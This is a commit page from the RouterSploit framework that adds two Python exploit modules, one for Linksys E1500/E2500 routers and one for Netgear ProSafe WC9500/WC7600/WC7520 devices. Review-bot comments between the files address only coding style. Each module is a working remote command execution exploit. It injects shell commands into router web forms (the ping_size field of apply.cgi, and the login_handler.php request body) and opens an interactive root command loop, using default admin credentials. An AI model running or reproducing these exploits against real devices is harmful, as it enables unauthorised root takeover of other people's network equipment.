Commit 5a9d73b3 by fwkz

Merge remote-tracking branch 'origin/master'

parents c9836b5e 07aeefdb
import requests
import re
from routersploit import *
class Exploit(exploits.Exploit):
"""
Exploit for Linksys E1500 and E2500 devices Remote Code Execution vulnerability.
If the target is vulnerable, command loop is invoked that allows executing commands with root privileges.
"""
__info__ = {
'name': 'Linksys E1500/E2500',
'description': 'Module exploits remote command execution in Linksys E1500/E2500 devices. Diagnostics interface allows executing root privileged shell commands is available on dedicated web pages on the device.',
'authors': [
'Michael Messner', # vulnerability discovery
'Esteban Rodriguez (n00py)', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/24475/',
],
'targets': [
'Linksys E1500/E2500',
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
port = exploits.Option(80, 'Target Port')
username = exploits.Option('admin', 'Username to login with')
password = exploits.Option('admin', 'Password to login with')
def run(self):
if self.check() == True:
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
else:
print_error("Target is not vulnerable")
def command_loop(self):
while 1:
cmd = raw_input("cmd > ")
print self.execute(cmd)
def execute(self, cmd):
url = sanitize_url("{}:{}/apply.cgi".format(self.target, self.port))
data = {"submit_button": "Diagnostics", "change_action":"gozila_cgi", "submit_type":"start_ping","action":"","commit":"0","ping_ip":"127.0.0.1","ping_size": "&" + cmd,"ping_times":"5","traceroute_ip":"127.0.0.1" }
try:
r = requests.post(url, data=data, auth=(self.username, self.password))
except requests.exceptions.MissingSchema:
return "Invalid URL format: %s" % url
except requests.exceptions.ConnectionError:
return "Connection error: %s" % url
return ""
def check(self):
# meaby random mark should be implemented
cmd = "echo 9fdbd928b52c1ef61615a6fd2e8b49af"
url = sanitize_url("{}:{}/apply.cgi".format(self.target, self.port))
data = {"submit_button": "Diagnostics", "change_action":"gozila_cgi", "submit_type":"start_ping","action":"","commit":"0","ping_ip":"127.0.0.1","ping_size": "&" + cmd,"ping_times":"5","traceroute_ip":"127.0.0.1" }
try:
r = requests.post(url, data=data, auth=(self.username, self.password))
res = r.text
except:
return None # could not be verified
if "9fdbd928b52c1ef61615a6fd2e8b49af" in res:
return True
return False
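Review bot: The bare `except:` in `check` (line 61) swallows every exception, including `KeyboardInterrupt` and `SystemExit`, and turns them into a `None` result that `run` then reports as "Target is not vulnerable"; narrow it to the same two exceptions `execute` already handles, `except (requests.exceptions.MissingSchema, requests.exceptions.ConnectionError):`. The same bare `except:` appears in the second file's `check` (line 127). `run` tests `self.check() == True`, but `check` can return `None`, `True` or `False`, so `if self.check() is True:` states the intent more precisely. `import re` and the response `r` assigned in `execute` (line 47) are unused in this module and should be dropped.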
import requests
import re
from routersploit import *
class Exploit(exploits.Exploit):
"""
Exploit implementation for Netgear ProSafe WC9500, WC7600, WC7520 remote command execution vulnerability.
If the target is vulnerable command shell is invoked.
"""
__info__ = {
'name': 'Netgear ProSafe RCE',
'description': 'Module exploits remote command execution vulnerability in Netgear ProSafe WC9500, WC7600, WC7520 devices. If the target is vulnerable command shell is invoked.',
'authors': [
'Andrei Costin <andrei[at]firmware.re>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://firmware.re/vulns/acsa-2015-002.php',
'https://www.blackhat.com/docs/asia-16/materials/asia-16-Costin-Automated-Dynamic-Firmware-Analysis-At-Scale-A-Case-Study-On-Embedded-Web-Interfaces.pdf',
],
'targets': [
'Netgear ProSafe WC9500',
'Netgear ProSafe WC7600',
'Netgear ProSafe WC7520',
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check() == True:
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
else:
print_error("Target is not vulnerable")
def command_loop(self):
while 1:
cmd = raw_input("cmd > ")
print self.execute(cmd)
def execute(self, cmd):
url = sanitize_url("{}:{}/login_handler.php".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData";{}; echo ffffffffffffffff'.format(cmd)
try:
r = requests.post(url, headers=headers, data=data)
res = r.text
except requests.exceptions.MissingSchema:
return "Invalid URL format: %s" % url
except requests.exceptions.ConnectionError:
return "Connection error: %s" % url
if 'ffffffffffffffff' in res:
res = re.findall("(|.+?)ffffffffffffffff", res, re.DOTALL)
if len(res):
return res[0]
return False
def check(self):
url = sanitize_url("{}:{}/login_handler.php".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData"; echo 9fdbd928b52c1ef61615a6fd2e8b49af'
try:
r = requests.post(url, headers=headers, data=data)
res = r.text
except:
return None # target could not be verified
if "9fdbd928b52c1ef61615a6fd2e8b49af" in res:
return True # target is vulnerable
return False # target not vulnerable
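Review bot: `check` and `execute` each rebuild the same `url` and `headers` (lines 105–106 and 121–122) and differ only in the request body, so a small private helper such as `_post(self, data)` that returns the response text or the existing error strings would keep the two in step and leave one place to narrow the exception handling. `execute` returns a `str` on success but `False` when the marker is absent (line 119), so `command_loop` prints the literal `False`; returning `""` in that branch would match the first file's `execute` and keep the return type uniform. The `u'...'` header literals and the `print` statement pin the module to Python 2, which is worth a one-line comment at the top of the class if that is intended.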